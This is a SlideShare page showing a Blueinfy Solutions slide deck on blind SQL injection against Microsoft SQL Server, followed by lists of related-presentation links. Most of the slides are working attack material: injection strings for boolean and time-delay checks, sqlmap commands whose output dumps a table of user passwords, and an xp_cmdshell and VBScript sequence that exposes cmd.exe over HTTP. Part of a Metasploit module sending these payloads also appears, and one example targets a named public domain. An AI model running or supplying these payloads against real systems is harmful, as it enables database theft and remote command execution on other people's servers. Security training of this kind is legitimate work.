SlideShare une entreprise Scribd logo

Blind SQL Injection

Télécharger en tant que PPT, PDF
B
Blueinfy Solutions

This presentation covers blind SQL injection techniques.

Technologie
1  sur  12
Blind SQL Injection
Blind SQL Injection • We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw. • Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”. • Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system. • We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command. • If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS.
Checks… • AND 1=1 • DBO check http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()='dbo' • Wait delay call http://192.168.50.50/details.aspx?id=1;waitfor+delay+'0:0:10' • (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115 • http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114 • http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),2,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97
Running tools • SQL Map or Absinthe D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:47:58 [18:48:00] [WARNING] the remote DMBS is not MySQL [18:48:00] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- [*] shutting down at: 18:48:14
Enumeration… D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:53:10 [18:53:12] [WARNING] the remote DMBS is not MySQL [18:53:12] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- available databases [9]: [*] CmdExec_example [*] Dashboard [*] catalog [*] demotrading [*] master [*] model [*] msdb [*] order [*] tempdb [*] shutting down at: 18:55:07
Enumeration… D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -D catalog sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:59:21 [18:59:22] [WARNING] the remote DMBS is not MySQL [18:59:22] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server Database: catalog [3 tables] +--------------+ | auth | | dtproperties | | items | +--------------+
Enumeration… D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D ca talog -T auth sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 19:01:27 [19:01:28] [WARNING] the remote DMBS is not MySQL [19:01:28] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server Database: catalog Table: auth [3 entries] +--------+------+---------+ | access | user | pass | +--------+------+---------+ | 101010 | dbo | john123 | | 110011 | | great | | 001011 | | loveit | +--------+------+---------+
Exploiting Set WshShell = WScript.CreateObject("WScript.Shell") Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%") windir = ObjExec.StdOut.ReadLine() Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT") Set Dir = Root.Create("IIsWebVirtualDir", "secret") Dir.Path = windir Dir.AccessExecute = True Dir.SetInfo http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell = WScript.CreateObject("WScript.Shell") > c:secret.vbs’ ….. ….. ….. http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo >> c:secret.vbs’ http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’
Get the cmd.exe • Run command over HTTP/HTTPS • http://target/secret/system32/cmd.exe?+/c+set
Metasploit … sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $path = $self->GetVar('RPATH'); my $vhost = $self->GetVar('VHOST'); my @url = split(/#/, $path); my @payload = ("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s'", "EXEC+master..xp_cmdshell+'echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'" ); $self->PrintLine("[+] Sending SQL injection payload..."); for(my $count=0;$count<=6;$count++) ..
Metasploit…
Conclusion

Recommandé

Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Shreeraj Shah
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 

Recommandé

Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Shreeraj Shah
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...Shreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperShreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
Advanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFAdvanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFjohnwilander
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web Shreeraj Shah
 
Top security threats to Flash/Flex applications and how to avoid them
Top security threats to Flash/Flex applications and how to avoid themTop security threats to Flash/Flex applications and how to avoid them
Top security threats to Flash/Flex applications and how to avoid themElad Elrom
 
Web Hacking
Web HackingWeb Hacking
Web HackingInformation Technology
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
Rest Security with JAX-RS
Rest Security with JAX-RSRest Security with JAX-RS
Rest Security with JAX-RSFrank Kim
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SASTBlueinfy Solutions
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
SQL Injection and Clickjacking Attack in Web security
SQL Injection and Clickjacking Attack in Web securitySQL Injection and Clickjacking Attack in Web security
SQL Injection and Clickjacking Attack in Web securityMoutasm Tamimi
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
Advanced xss
Advanced xssAdvanced xss
Advanced xssGajendra Saini
 
JSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedJSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedKazuho Oku
 
UserCentric Identity based Service Invocation
UserCentric Identity based Service InvocationUserCentric Identity based Service Invocation
UserCentric Identity based Service Invocationguestd5dde6
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hackingBlueinfy Solutions
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Jeremiah Grossman
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStormShu Sugimoto
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 

Contenu connexe

Tendances

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...Shreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperShreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
Advanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFAdvanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFjohnwilander
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web Shreeraj Shah
 
Top security threats to Flash/Flex applications and how to avoid them
Top security threats to Flash/Flex applications and how to avoid themTop security threats to Flash/Flex applications and how to avoid them
Top security threats to Flash/Flex applications and how to avoid themElad Elrom
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
Rest Security with JAX-RS
Rest Security with JAX-RSRest Security with JAX-RS
Rest Security with JAX-RSFrank Kim
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SASTBlueinfy Solutions
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
SQL Injection and Clickjacking Attack in Web security
SQL Injection and Clickjacking Attack in Web securitySQL Injection and Clickjacking Attack in Web security
SQL Injection and Clickjacking Attack in Web securityMoutasm Tamimi
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
JSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedJSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedKazuho Oku
 
UserCentric Identity based Service Invocation
UserCentric Identity based Service InvocationUserCentric Identity based Service Invocation
UserCentric Identity based Service Invocationguestd5dde6
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Jeremiah Grossman
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 

Tendances (20)

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
Advanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRFAdvanced CSRF and Stateless Anti-CSRF
Advanced CSRF and Stateless Anti-CSRF
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
 
Top security threats to Flash/Flex applications and how to avoid them
Top security threats to Flash/Flex applications and how to avoid themTop security threats to Flash/Flex applications and how to avoid them
Top security threats to Flash/Flex applications and how to avoid them
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
Rest Security with JAX-RS
Rest Security with JAX-RSRest Security with JAX-RS
Rest Security with JAX-RS
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SAST
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
SQL Injection and Clickjacking Attack in Web security
SQL Injection and Clickjacking Attack in Web securitySQL Injection and Clickjacking Attack in Web security
SQL Injection and Clickjacking Attack in Web security
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Advanced xss
Advanced xssAdvanced xss
Advanced xss
 
JSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedJSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons Learned
 
UserCentric Identity based Service Invocation
UserCentric Identity based Service InvocationUserCentric Identity based Service Invocation
UserCentric Identity based Service Invocation
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 

Similaire à Blind SQL Injection

Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStormShu Sugimoto
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 
Triangle OpenStack meetup 09 2013
Triangle OpenStack meetup 09 2013Triangle OpenStack meetup 09 2013
Triangle OpenStack meetup 09 2013Dan Radez
 
Sql server clustering msdtc
Sql server clustering msdtcSql server clustering msdtc
Sql server clustering msdtcShreeram Rane
 
The enterprise manager command line interface2
The enterprise manager command line interface2The enterprise manager command line interface2
The enterprise manager command line interface2Kellyn Pot'Vin-Gorman
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
 
Clouldera Implementation Guide for Production Deployments
Clouldera Implementation Guide for Production DeploymentsClouldera Implementation Guide for Production Deployments
Clouldera Implementation Guide for Production DeploymentsAhmed Mekawy
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers dofangjiafu
 
My old security advisories on HMI/SCADA and industrial software released betw...
My old security advisories on HMI/SCADA and industrial software released betw...My old security advisories on HMI/SCADA and industrial software released betw...
My old security advisories on HMI/SCADA and industrial software released betw...Luigi Auriemma
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthowaspindia
 
Percona xtra db cluster(pxc) non blocking operations, what you need to know t...
Percona xtra db cluster(pxc) non blocking operations, what you need to know t...Percona xtra db cluster(pxc) non blocking operations, what you need to know t...
Percona xtra db cluster(pxc) non blocking operations, what you need to know t...Marco Tusa
 
Build your own private openstack cloud
Build your own private openstack cloudBuild your own private openstack cloud
Build your own private openstack cloudNUTC, imac
 
05 module managing your network enviornment
05 module managing your network enviornment05 module managing your network enviornment
05 module managing your network enviornmentAsif
 

Similaire à Blind SQL Injection (20)

Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStorm
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatz
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Triangle OpenStack meetup 09 2013
Triangle OpenStack meetup 09 2013Triangle OpenStack meetup 09 2013
Triangle OpenStack meetup 09 2013
 
Sql server clustering msdtc
Sql server clustering msdtcSql server clustering msdtc
Sql server clustering msdtc
 
Operating System Engineering Quiz
Operating System Engineering QuizOperating System Engineering Quiz
Operating System Engineering Quiz
 
The enterprise manager command line interface2
The enterprise manager command line interface2The enterprise manager command line interface2
The enterprise manager command line interface2
 
vBACD - Introduction to Opscode Chef - 2/29
vBACD - Introduction to Opscode Chef - 2/29vBACD - Introduction to Opscode Chef - 2/29
vBACD - Introduction to Opscode Chef - 2/29
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 
Windows PowerShell
Windows PowerShellWindows PowerShell
Windows PowerShell
 
Clouldera Implementation Guide for Production Deployments
Clouldera Implementation Guide for Production DeploymentsClouldera Implementation Guide for Production Deployments
Clouldera Implementation Guide for Production Deployments
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers do
 
My old security advisories on HMI/SCADA and industrial software released betw...
My old security advisories on HMI/SCADA and industrial software released betw...My old security advisories on HMI/SCADA and industrial software released betw...
My old security advisories on HMI/SCADA and industrial software released betw...
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharth
 
Linux class 10 15 oct 2021-6
Linux class 10 15 oct 2021-6Linux class 10 15 oct 2021-6
Linux class 10 15 oct 2021-6
 
Percona xtra db cluster(pxc) non blocking operations, what you need to know t...
Percona xtra db cluster(pxc) non blocking operations, what you need to know t...Percona xtra db cluster(pxc) non blocking operations, what you need to know t...
Percona xtra db cluster(pxc) non blocking operations, what you need to know t...
 
Build your own private openstack cloud
Build your own private openstack cloudBuild your own private openstack cloud
Build your own private openstack cloud
 
05 module managing your network enviornment
05 module managing your network enviornment05 module managing your network enviornment
05 module managing your network enviornment
 
Gradle como alternativa a maven
Gradle como alternativa a mavenGradle como alternativa a maven
Gradle como alternativa a maven
 

Plus de Blueinfy Solutions

Mobile Application Scan and Testing
Mobile Application Scan and TestingMobile Application Scan and Testing
Mobile Application Scan and TestingBlueinfy Solutions
 
Mobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseMobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseBlueinfy Solutions
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Blueinfy Solutions
 
iOS Application Security Testing
iOS Application Security TestingiOS Application Security Testing
iOS Application Security TestingBlueinfy Solutions
 
Automation In Android & iOS Application Review
Automation In Android & iOS Application Review�Automation In Android & iOS Application Review�
Automation In Android & iOS Application ReviewBlueinfy Solutions
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and SecurityBlueinfy Solutions
 
XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionBlueinfy Solutions
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationBlueinfy Solutions
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approachBlueinfy Solutions
 
HTTP protocol and Streams Security
HTTP protocol and Streams SecurityHTTP protocol and Streams Security
HTTP protocol and Streams SecurityBlueinfy Solutions
 
Advanced applications-architecture-threats
Advanced applications-architecture-threatsAdvanced applications-architecture-threats
Advanced applications-architecture-threatsBlueinfy Solutions
 

Plus de Blueinfy Solutions (18)

Mobile Application Scan and Testing
Mobile Application Scan and TestingMobile Application Scan and Testing
Mobile Application Scan and Testing
 
Mobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseMobile security chess board - attacks & defense
Mobile security chess board - attacks & defense
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013
 
iOS Application Security Testing
iOS Application Security TestingiOS Application Security Testing
iOS Application Security Testing
 
Html5 on mobile
Html5 on mobileHtml5 on mobile
Html5 on mobile
 
Android secure coding
Android secure codingAndroid secure coding
Android secure coding
 
Android attacks
Android attacksAndroid attacks
Android attacks
 
Automation In Android & iOS Application Review
Automation In Android & iOS Application Review�Automation In Android & iOS Application Review�
Automation In Android & iOS Application Review
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and Security
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
Defending against Injections
Defending against InjectionsDefending against Injections
Defending against Injections
 
XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal Injection
 
Application fuzzing
Application fuzzingApplication fuzzing
Application fuzzing
 
SQL injection basics
SQL injection basicsSQL injection basics
SQL injection basics
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approach
 
HTTP protocol and Streams Security
HTTP protocol and Streams SecurityHTTP protocol and Streams Security
HTTP protocol and Streams Security
 
Advanced applications-architecture-threats
Advanced applications-architecture-threatsAdvanced applications-architecture-threats
Advanced applications-architecture-threats
 

Dernier

Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
